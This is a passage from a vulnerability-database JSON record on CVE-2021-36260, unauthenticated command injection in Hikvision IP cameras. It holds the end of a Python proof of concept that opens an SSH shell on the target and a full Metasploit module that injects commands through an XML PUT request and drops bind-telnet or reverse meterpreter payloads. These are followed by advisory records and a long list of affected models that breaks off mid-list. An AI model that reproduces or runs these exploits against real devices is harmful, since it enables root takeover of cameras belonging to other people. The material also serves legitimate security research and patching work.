N>webLib/N') \nelse: \nprint(f'[i] Remote \"{args.rhost}\" already pwned') \n \nprint(f'[*] Trying SSH to {args.rhost} on port 1337') \nos.system(f'stty echo; stty iexten; stty icanon; \\ \nssh -o StrictHostKeyChecking=no -o LogLevel=error -o UserKnownHostsFile=/dev/null \\ \nP@{args.rhost} -p 1337') \n \n \ndef main(): \nprint('[*] Hikvision CVE-2021-36260\\n[*] PoC by bashis <mcw noemail eu> (2021)') \n \nparser = argparse.ArgumentParser() \nparser.add_argument('--rhost', required=True, type=str, default=None, help='Remote Target Address (IP/FQDN)') \nparser.add_argument('--rport', required=False, type=int, default=80, help='Remote Target Port') \nparser.add_argument('--check', required=False, default=False, action='store_true', help='Check if vulnerable') \nparser.add_argument('--reboot', required=False, default=False, action='store_true', help='Reboot if vulnerable') \nparser.add_argument('--shell', required=False, default=False, action='store_true', help='Launch SSH shell') \nparser.add_argument('--cmd', required=False, type=str, default=None, help='execute cmd (i.e: \"ls -l\")') \nparser.add_argument('--cmd_blind', required=False, type=str, default=None, help='execute blind cmd (i.e: \"reboot\")') \nparser.add_argument( \n'--noverify', required=False, default=False, action='store_true', help='Do not verify if vulnerable' \n) \nparser.add_argument( \n'--proto', required=False, type=str, choices=['http', 'https'], default='http', help='Protocol used' \n) \nargs = parser.parse_args() \n \nremote = Http(args.rhost, args.rport, args.proto) \n \ntry: \nif args.shell: \nshell(remote, args) \nelif args.cmd: \ncmd(remote, args) \nelif args.cmd_blind: \ncmd_blind(remote, args) \nelif args.check: \ncheck(remote, args) \nelif args.reboot: \ncheck_reboot(remote, args) \nelse: \nparser.parse_args(['-h']) \nexcept KeyboardInterrupt: \nreturn False \n \n \nif __name__ == '__main__': \nmain() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164603/hikvision210702-exec.txt", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-28T16:54:58", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-28T00:00:00", "type": "packetstorm", "title": "Hikvision IP Camera Unauthenticated Command Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36260"], "modified": "2022-02-28T00:00:00", "id": "PACKETSTORM:166167", "href": "https://packetstormsecurity.com/files/166167/Hikvision-IP-Camera-Unauthenticated-Command-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Hikvision IP Camera Unauthenticated Command Injection', \n'Description' => %q{ \nThis module exploits an unauthenticated command injection in a variety of Hikvision IP \ncameras (CVE-2021-36260). The module inserts a command into an XML payload used with an \nHTTP PUT request sent to the `/SDK/webLanguage` endpoint, resulting in command execution \nas the `root` user. \n \nThis module specifically attempts to exploit the blind variant of the attack. The module \nwas successfully tested against an HWI-B120-D/W using firmware V5.5.101 build 200408. It \nwas also tested against an unaffected DS-2CD2142FWD-I using firmware V5.5.0 build 170725. \nPlease see the Hikvision advisory for a full list of affected products. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Watchful_IP', # Vulnerability discovery and disclosure \n'bashis', # Proof of concept \n'jbaines-r7' # Metasploit module \n], \n'References' => [ \n[ 'CVE', '2021-36260' ], \n[ 'URL', 'https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html'], \n[ 'URL', 'https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/security-notification-command-injection-vulnerability-in-some-hikvision-products/'], \n[ 'URL', 'https://github.com/mcw0/PoC/blob/master/CVE-2021-36260.py'] \n], \n'DisclosureDate' => '2021-09-18', \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_ARMLE], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n# the target has very limited payload targets and a tight payload space. \n# bind_busybox_telnetd might be *the only* one. \n'PAYLOAD' => 'cmd/unix/bind_busybox_telnetd', \n# saving four bytes of payload space by using 'sh' instead of '/bin/sh' \n'LOGIN_CMD' => 'sh', \n'Space' => 23 \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_ARMLE], \n'Type' => :linux_dropper, \n'CmdStagerFlavor' => [ 'printf', 'echo' ], \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 80, \n'SSL' => false, \n'MeterpreterTryToFork' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \n# Check will test two things: \n# 1. Is the endpoint a Hikvision camera? \n# 2. Does the endpoint respond as expected to exploitation? This module is \n# specifically testing for the blind variant of this attack so we key off \n# of the returned HTTP status code. The developer's test target responded \n# to exploitation with a 500. Notes from bashis' exploit indicates that \n# they saw targets respond with 200 as well, so we'll accept that also. \ndef check \n# Hikvision landing page redirects to '/doc/page/login.asp' via JavaScript: \n# <script> \n# window.location.href = \"/doc/page/login.asp?_\" + (new Date()).getTime(); \n# </script> \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/') \n}) \nreturn CheckCode::Unknown(\"Didn't receive a response from the target.\") unless res \nreturn CheckCode::Safe('The target did not respond with a 200 OK') unless res.code == 200 \nreturn CheckCode::Safe('The target doesn\\'t appear to be a Hikvision device') unless res.body.include?('/doc/page/login.asp?_') \n \npayload = '<xml><language>$(cat /proc/cpuinfo)</language></xml>' \nres = send_request_cgi({ \n'method' => 'PUT', \n'uri' => normalize_uri(target_uri.path, '/SDK/webLanguage'), \n'data' => payload \n}) \n \nreturn CheckCode::Unknown(\"Didn't receive a response from the target.\") unless res \nreturn CheckCode::Safe('The target did not respond with a 200 OK or 500 error') unless (res.code == 200 || res.code == 500) \n \n# Some cameras are not vulnerable and still respond 500. We can weed them out by making \n# the remote target sleep and use a low timeout. This might not be good for high latency targets \n# or for people using Metasploit as a vulnerability scanner... but it's better than flagging all \n# 500 responses as vulnerable. \npayload = '<xml><language>$(sleep 20)</language></xml>' \nres = send_request_cgi({ \n'method' => 'PUT', \n'uri' => normalize_uri(target_uri.path, '/SDK/webLanguage'), \n'data' => payload \n}, 10) \n \nreturn CheckCode::Appears('It appears the target executed the provided sleep command.') unless res \n \nCheckCode::Safe('The target did not execute the provided sleep command.') \nend \n \ndef execute_command(cmd, _opts = {}) \n# The injection space is very small. The entire snprintf is 0x1f bytes and the \n# format string is: \n# \n# /dav/%s.tar.gz \n# \n# Which accounts for 12 bytes, leaving only 19 bytes for our payload. Fortunately, \n# snprintf will let us reclaim '.tar.gz' so in reality, there are 26 bytes for \n# our payload. We need 3 bytes to invoke our injection: $(). Leaving 23 bytes \n# for payload. The 'echo' stager has a minium of 26 bytes but we obviously don't \n# have that much space. We can steal the extra space from the \"random\" file name \n# and compress ' >> ' to '>>'. That will get us below 23. Squeezing the extra \n# bytes will also allow printf stager to do more than 1 byte per exploitation. \ncmd = cmd.gsub(%r{tmp/[0-9a-zA-Z]+}, @fname) \ncmd = cmd.gsub(/ >/, '>') \ncmd = cmd.gsub(/> /, '>') \n \npayload = \"<xml><language>$(#{cmd})</language></xml>\" \nres = send_request_cgi({ \n'method' => 'PUT', \n'uri' => normalize_uri(target_uri.path, '/SDK/webLanguage'), \n'data' => payload \n}) \n \nfail_with(Failure::Disconnected, 'Connection failed') unless res \nfail_with(Failure::UnexpectedReply, \"HTTP status code is not 200 or 500: #{res.code}\") unless (res.code == 200 || res.code == 500) \nend \n \ndef exploit \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \n# generate a random value for the tmp file name. See execute_command for details \n@fname = \"tmp/#{Rex::Text.rand_text_alpha(1)}\" \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \n# 26 is technically a lie. See `execute_command` for additional insight \nexecute_cmdstager(linemax: 26) \nend \nend \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/166167/hikvision_cve_2021_36260_blind.rb.txt"}], "checkpoint_advisories": [{"lastseen": "2022-03-29T07:30:05", "description": "A command injection vulnerability exists in Hikvision Web Server. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-28T00:00:00", "type": "checkpoint_advisories", "title": "Hikvision Web Server Command Injection (CVE-2021-36260)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36260"], "modified": "2022-03-28T00:00:00", "id": "CPAI-2021-1025", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-04-05T23:35:23", "description": "A command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-22T13:15:00", "type": "cve", "title": "CVE-2021-36260", "cwe": ["CWE-77"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36260"], "modified": "2022-04-05T20:56:00", "cpe": ["cpe:/o:hikvision:ds-2cd3163g2-i\\(s\\)u_firmware:-", "cpe:/o:hikvision:ds-2cd2543g2-i\\(ws\\)_firmware:-", "cpe:/o:hikvision:ds-7608ni-q1_firmware:4.31.000", "cpe:/o:hikvision:ds-2df8250i8x-ael\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-7108ni-q1_firmware:4.31.100", "cpe:/o:hikvision:ds-2df6a436x-aely\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2526g2-is_firmware:-", "cpe:/o:hikvision:ds-2df7232ix-aelw\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-7608ni-q1\\/8p_firmware:4.31.000", "cpe:/o:hikvision:ds-7608ni-q2_firmware:4.31.000", "cpe:/o:hikvision:ds-2cd2666g2-izs_firmware:-", "cpe:/o:hikvision:ds-2td6267-75c4l\\/w_firmware:-", "cpe:/o:hikvision:ds-2dy9236ix-a\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2df8242i5x-aelw\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2df8225ix-ael\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2df8425ix-aelw\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2df8a442ixs-aely\\(t5\\)_firmware:-", "cpe:/o:hikvision:ids-2pt9a144mxs-d\\/t2_firmware:-", "cpe:/o:hikvision:ds-2td6267-50h4l\\/w_firmware:-", "cpe:/o:hikvision:ds-2cd2683g2-izs_firmware:-", "cpe:/o:hikvision:ds-2cd2066g2-i\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2743g2-izs_firmware:-", "cpe:/o:hikvision:ds-2cd3356g2-isu\\/sl_firmware:-", "cpe:/o:hikvision:ds-7104ni-q1\\/4p\\/m_firmware:4.31.100", "cpe:/o:hikvision:ds-2cd2021g1-i\\(w\\)_firmware:-", "cpe:/o:hikvision:ds-2dy92500x-a\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2df8442ixs-ael\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2df6a436x-ael\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2df8425ix-ael\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2td8166-100c2f\\/v2_firmware:-", "cpe:/o:hikvision:ds-2td8166-180ze2f\\/v2_firmware:-", "cpe:/o:hikvision:ds-7608ni-k1\\/8p\\/4g_firmware:4.31.000", "cpe:/o:hikvision:ds-2cd2163g2-iu_firmware:-", "cpe:/o:hikvision:ds-2df7225ix-aelw\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2td1217b-6\\/pa_firmware:-", "cpe:/o:hikvision:ds-2cd2621g0-i\\(z\\)\\(s\\)_firmware:-", "cpe:/o:hikvision:ds-2cd3343g2-iu_firmware:-", "cpe:/o:hikvision:ds-2df7232ix-ael\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2183g2-i\\(s\\)_firmware:-", "cpe:/o:hikvision:ds-2df5225x-ae3\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2df8a442nxs-ael\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2583g2-i\\(s\\)_firmware:-", "cpe:/o:hikvision:ds-2cd3123g2-i\\(s\\)u_firmware:-", "cpe:/o:hikvision:ds-2cd2327g2-l\\(u\\)_firmware:-", "cpe:/o:hikvision:ptz-n4225i-de_firmware:-", "cpe:/o:hikvision:ds-2td6266t-25h2l_firmware:-", "cpe:/o:hikvision:ds-2cd2721g0-i\\(z\\)\\(s\\)_firmware:-", "cpe:/o:hikvision:ds-2df8242ix-aelw\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2td6266t-50h2l_firmware:-", "cpe:/o:hikvision:ds-2df5232x-ae3\\)t3\\)_firmware:-", "cpe:/o:hikvision:ds-2dy9236x-a\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2cd3047g2-ls_firmware:-", "cpe:/o:hikvision:ds-2xe6452f-izh\\(r\\)s_firmware:-", "cpe:/o:hikvision:ds-2cd2326g2-isu\\/sl_firmware:-", "cpe:/o:hikvision:ds-2cd2446g2-i_firmware:-", "cpe:/o:hikvision:ds-2xe6482f-izhrs_firmware:-", "cpe:/o:hikvision:ds-2cd3563g2-is_firmware:-", "cpe:/o:hikvision:ds-2td8167-150zc4f\\/w_firmware:-", "cpe:/o:hikvision:ds-7608ni-k1\\/4g_firmware:-", "cpe:/o:hikvision:ds-2cd2143g2-i\\(s\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2386g2-isu\\/sl_firmware:-", "cpe:/o:hikvision:ds-2td8167-230zg2f\\/w_firmware:-", "cpe:/o:hikvision:ds-2df8436i5x-aelw\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2df8225ix-aelw\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2cd3756g2-izs_firmware:-", "cpe:/o:hikvision:ds-2df8225ix-aelw\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-7604ni-q1_firmware:4.31.000", "cpe:/o:hikvision:ds-2cd2646g2-izsu\\/sl_firmware:-", "cpe:/o:hikvision:ds-2cd3143g2-i\\(s\\)u_firmware:-", "cpe:/o:hikvision:ds-7616ni-q2\\/16p_firmware:4.31.000", "cpe:/o:hikvision:ds-2cd3386g2-is\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2cd3626g2-izs_firmware:-", "cpe:/o:hikvision:ds-7604ni-k1\\/4p\\/4g_firmware:-", "cpe:/o:hikvision:ds-2cd2346g2-isu\\/sl_firmware:-", "cpe:/o:hikvision:ds-2cd3686g2-izs_firmware:-", "cpe:/o:hikvision:ids-2sk8144ixs-d\\/j_firmware:-", "cpe:/o:hikvision:ds-2df8a442ixs-ael\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2323g2-i\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2td8166-150ze2f\\/v2_firmware:-", "cpe:/o:hikvision:ds-2df6a836x-ael\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2cd3547g2-ls_firmware:-", "cpe:/o:hikvision:ds-2cd2183g2-i\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2766g2-izs_firmware:-", "cpe:/o:hikvision:ds-2df8242i5x-aelw\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2183g2-iu_firmware:-", "cpe:/o:hikvision:ds-2cd2321g0-i\\/nf_firmware:-", "cpe:/o:hikvision:ds-2cd2383g2-i\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2166g2-i\\(su\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2723g2-izs_firmware:-", "cpe:/o:hikvision:ds-2cd3043g2-iu_firmware:-", "cpe:/o:hikvision:ds-2cd2666g2-izsu\\/sl_firmware:-", "cpe:/o:hikvision:ds-2cd2363g2-i\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2cd3347g2-ls\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2563g2-i\\(s\\)_firmware:-", "cpe:/o:hikvision:ds-2cd3523g2-is_firmware:-", "cpe:/o:hikvision:ds-2df8225ih-ael\\(w\\)_firmware:-", "cpe:/o:hikvision:ds-2df8242i5x-ael\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2td4136t-9_firmware:-", "cpe:/o:hikvision:ds-2cd2566g2-i\\(s\\)_firmware:-", "cpe:/o:hikvision:ds-2cd3763g2-izs_firmware:-", "cpe:/o:hikvision:ds-2cd2121g0-i\\(w\\)\\(s\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2783g2-izs_firmware:-", "cpe:/o:hikvision:ds-2cd3643g2-izs_firmware:-", "cpe:/o:hikvision:ds-2cd3026g2-iu\\/sl_firmware:-", "cpe:/o:hikvision:ds-2df6a825x-ael_firmware:-", "cpe:/o:hikvision:ds-2cd2147g2-l\\(su\\)_firmware:-", "cpe:/o:hikvision:ds-2cd3026g2-is_firmware:-", "cpe:/o:hikvision:ds-2cd2786g2-izs_firmware:-", "cpe:/o:hikvision:ds-2td1217b-3\\/pa_firmware:-", "cpe:/o:hikvision:ds-2cd2083g2-i\\(u\\)_firmware:-", "cpe:/o:hikvision:ids-2vs435-f840-ey\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-7108ni-q1\\/m_firmware:4.31.100", "cpe:/o:hikvision:ds-2cd2366g2-isu\\/sl_firmware:-", "cpe:/o:hikvision:ds-2cd2523g2-i\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2td4137-25\\/w_firmware:-", "cpe:/o:hikvision:ds-2cd2123g2-iu_firmware:-", "cpe:/o:hikvision:ds-7608ni-k1\\/8p_firmware:-", "cpe:/o:hikvision:ds-2cd3056g2-is_firmware:-", "cpe:/o:hikvision:ds-2cd3023g2-iu_firmware:-", "cpe:/o:hikvision:ds-2df8442ixs-aely\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-7604ni-q1\\/4p_firmware:4.31.000", "cpe:/o:hikvision:ds-2df8442ixs-aelwy\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2df8225ix-ael\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-7616ni-q1_firmware:4.31.000", "cpe:/o:hikvision:ds-2cd3063g2-iu_firmware:-", "cpe:/o:hikvision:ds-2cd2086g2-i\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2663g2-izs_firmware:-", "cpe:/o:hikvision:ds-2xe6422fwd-izhrs_firmware:-", "cpe:/o:hikvision:ds-2cd3656g2-izs_firmware:-", "cpe:/o:hikvision:ds-7104ni-q1_firmware:4.31.100", "cpe:/o:hikvision:ids-2vs435-f840-ey_firmware:-", "cpe:/o:hikvision:ds-2cd3723g2-izs_firmware:-", "cpe:/o:hikvision:ds-2cd3386g2-is_firmware:-", "cpe:/o:hikvision:ds-2dyh2a0ixs-d\\(t2\\)_firmware:-", "cpe:/o:hikvision:ds-2df8236i5x-aelw_firmware:-", "cpe:/o:hikvision:ds-2cd3156g2-is\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2df8a442ixs-ael\\(t2\\)_firmware:-", "cpe:/o:hikvision:ds-2td4167-50\\/w_firmware:-", "cpe:/o:hikvision:ds-2td8166-75c2f\\/v2_firmware:-", "cpe:/o:hikvision:ds-2cd3056g2iu\\/sl_firmware:-", "cpe:/o:hikvision:ds-760ni-k1\\/4p_firmware:-", "cpe:/o:hikvision:ds-2df6a236x-ael\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2df8425ix-ael\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2df8242ix-aely\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2023g2-i\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2063g2-i\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2421g0-i\\(d\\)\\(w\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2623g2-izs_firmware:-", "cpe:/o:hikvision:ds-2cd2366g2-i\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2xe6242f-is\\/316l\\(b\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2127g2-\\(-su\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2121g1-idw_firmware:-", "cpe:/o:hikvision:ds-2td4137-50\\/w_firmware:-", "cpe:/o:hikvision:ds-2cd2421g0-i\\(d\\)w_firmware:-", "cpe:/o:hikvision:ptz-n4215i-de_firmware:-", "cpe:/o:hikvision:ds-2cd3056g2-iu\\/sl_firmware:-", "cpe:/o:hikvision:ds-7104ni-q1\\/m_firmware:4.31.100", "cpe:/o:hikvision:ds-2cd2343g2-i\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2547g2-ls_firmware:-", "cpe:/o:hikvision:ds-2cd3126g2-is_firmware:-", "cpe:/o:hikvision:ds-2df8a842ixs-ael\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2td6236t-50h2l_firmware:-", "cpe:/o:hikvision:ds-2cd2426g2-i_firmware:-", "cpe:/o:hikvision:ds-2cd3586g2-is_firmware:-", "cpe:/o:hikvision:ds-2cd3126g2-is\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2df5232x-ael\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2cd3363g2-iu_firmware:-", "cpe:/o:hikvision:ds-2cd2547g2-lzs_firmware:-", "cpe:/o:hikvision:ds-2cd3526g2-is_firmware:-", "cpe:/o:hikvision:ds-2cd2043g2-i\\(u\\)_firmware:-", "cpe:/o:hikvision:ptz-n2404i-de3_firmware:-", "cpe:/o:hikvision:ds-2td4166t-9_firmware:-", "cpe:/o:hikvision:ds-2df8a442ixs-af\\/sp\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2cd3323g2-iu_firmware:-", "cpe:/o:hikvision:ds-2td8166-150zh2f\\/v2_firmware:-", "cpe:/o:hikvision:ds-2cd3156g2-is_firmware:-", "cpe:/o:hikvision:ds-2cd3786g2-izs_firmware:-", "cpe:/o:hikvision:ds-2cd2123g2-i\\(s\\)_firmware:-", "cpe:/o:hikvision:ds-2dy9240ix-a\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2td6267-100c4l\\/w_firmware:-", "cpe:/o:hikvision:ds-2df7225ix-ael\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2df8425ix-aelw\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2cd3186g2-is\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2163g2-i\\(s\\)_firmware:-", "cpe:/o:hikvision:ds-2td6237-75c4l\\/w_firmware:-", "cpe:/o:hikvision:ds-2dy9236i8x-a\\(t3\\)_firmware:-", "cpe:/o:hikvision:ptz-n2204i-de3_firmware:-", "cpe:/o:hikvision:ds-2df8442ixs-aelw\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-7108ni-q1\\/8p\\/m_firmware:4.31.100", "cpe:/o:hikvision:ds-2cd2523g2-i\\(s\\)_firmware:-", "cpe:/o:hikvision:ds-2cd3326g2-isu\\/sl_firmware:-", "cpe:/o:hikvision:ds-2cd3623g2-izs_firmware:-", "cpe:/o:hikvision:ds-2cd2047g2-l\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2121g1_firmware:-", "cpe:/o:hikvision:ds-2cd2086g2-iu\\/sl_firmware:-", "cpe:/o:hikvision:ds-2td1117-6\\/pa_firmware:-", "cpe:/o:hikvision:ds-2df5225x-ael\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2526g2-i\\(s\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2626g2-izsu\\/sl_firmware:-", "cpe:/o:hikvision:ds-2cd2046g2-iu\\/sl_firmware:-", "cpe:/o:hikvision:ds-7616ni-k1_firmware:4.31.000", "cpe:/o:hikvision:ds-2dy9250izs-a\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-7604ni-k1_firmware:-", "cpe:/o:hikvision:ds-2cd2121g1-i\\(w\\)_firmware:-", "cpe:/o:hikvision:ids-2sk718mxs-d_firmware:-", "cpe:/o:hikvision:ds-2td4167-25\\/w_firmware:-", "cpe:/o:hikvision:ds-2df6a436x-ael\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2df8442ixs-aelw\\(t2\\)_firmware:-", "cpe:/o:hikvision:ds-7608ni-k1_firmware:-", "cpe:/o:hikvision:ds-2td1117-3\\/pa_firmware:-", "cpe:/o:hikvision:ds-2cd2186g2-i\\(su\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2763g2-izs_firmware:-", "cpe:/o:hikvision:ds-2cd3356g2-is_firmware:-", "cpe:/o:hikvision:ds-2td8167-230zg2f\\/wy_firmware:-", "cpe:/o:hikvision:ds-2cd2686g2-izs_firmware:-", "cpe:/o:hikvision:ds-2cd3556g2-is_firmware:-", "cpe:/o:hikvision:ds-7108ni-q1\\/8p_firmware:4.31.100", "cpe:/o:hikvision:ds-2cd2026g2-iu\\/sl_firmware:-", "cpe:/o:hikvision:ds-2xe6442f-izhrs\\(b\\)_firmware:-", "cpe:/o:hikvision:ptz-n4215-de3_firmware:-", "cpe:/o:hikvision:ds-2cd3663g2-izs_firmware:-", "cpe:/o:hikvision:ds-7616ni-q2_firmware:4.31.000", "cpe:/o:hikvision:ds-2td8167-190ze2f\\/wy_firmware:-", "cpe:/o:hikvision:ds-2cd2386g2-i\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2td8167-190ze2f\\/w_firmware:-", "cpe:/o:hikvision:ds-2td1117-2\\/pa_firmware:-", "cpe:/o:hikvision:ds-7608ni-q2\\/8p_firmware:4.31.000", "cpe:/o:hikvision:ds-2cd2643g2-izs_firmware:-", "cpe:/o:hikvision:ds-2cd2186g2-isu_firmware:-", "cpe:/o:hikvision:ds-2cd2527g2-ls_firmware:-", 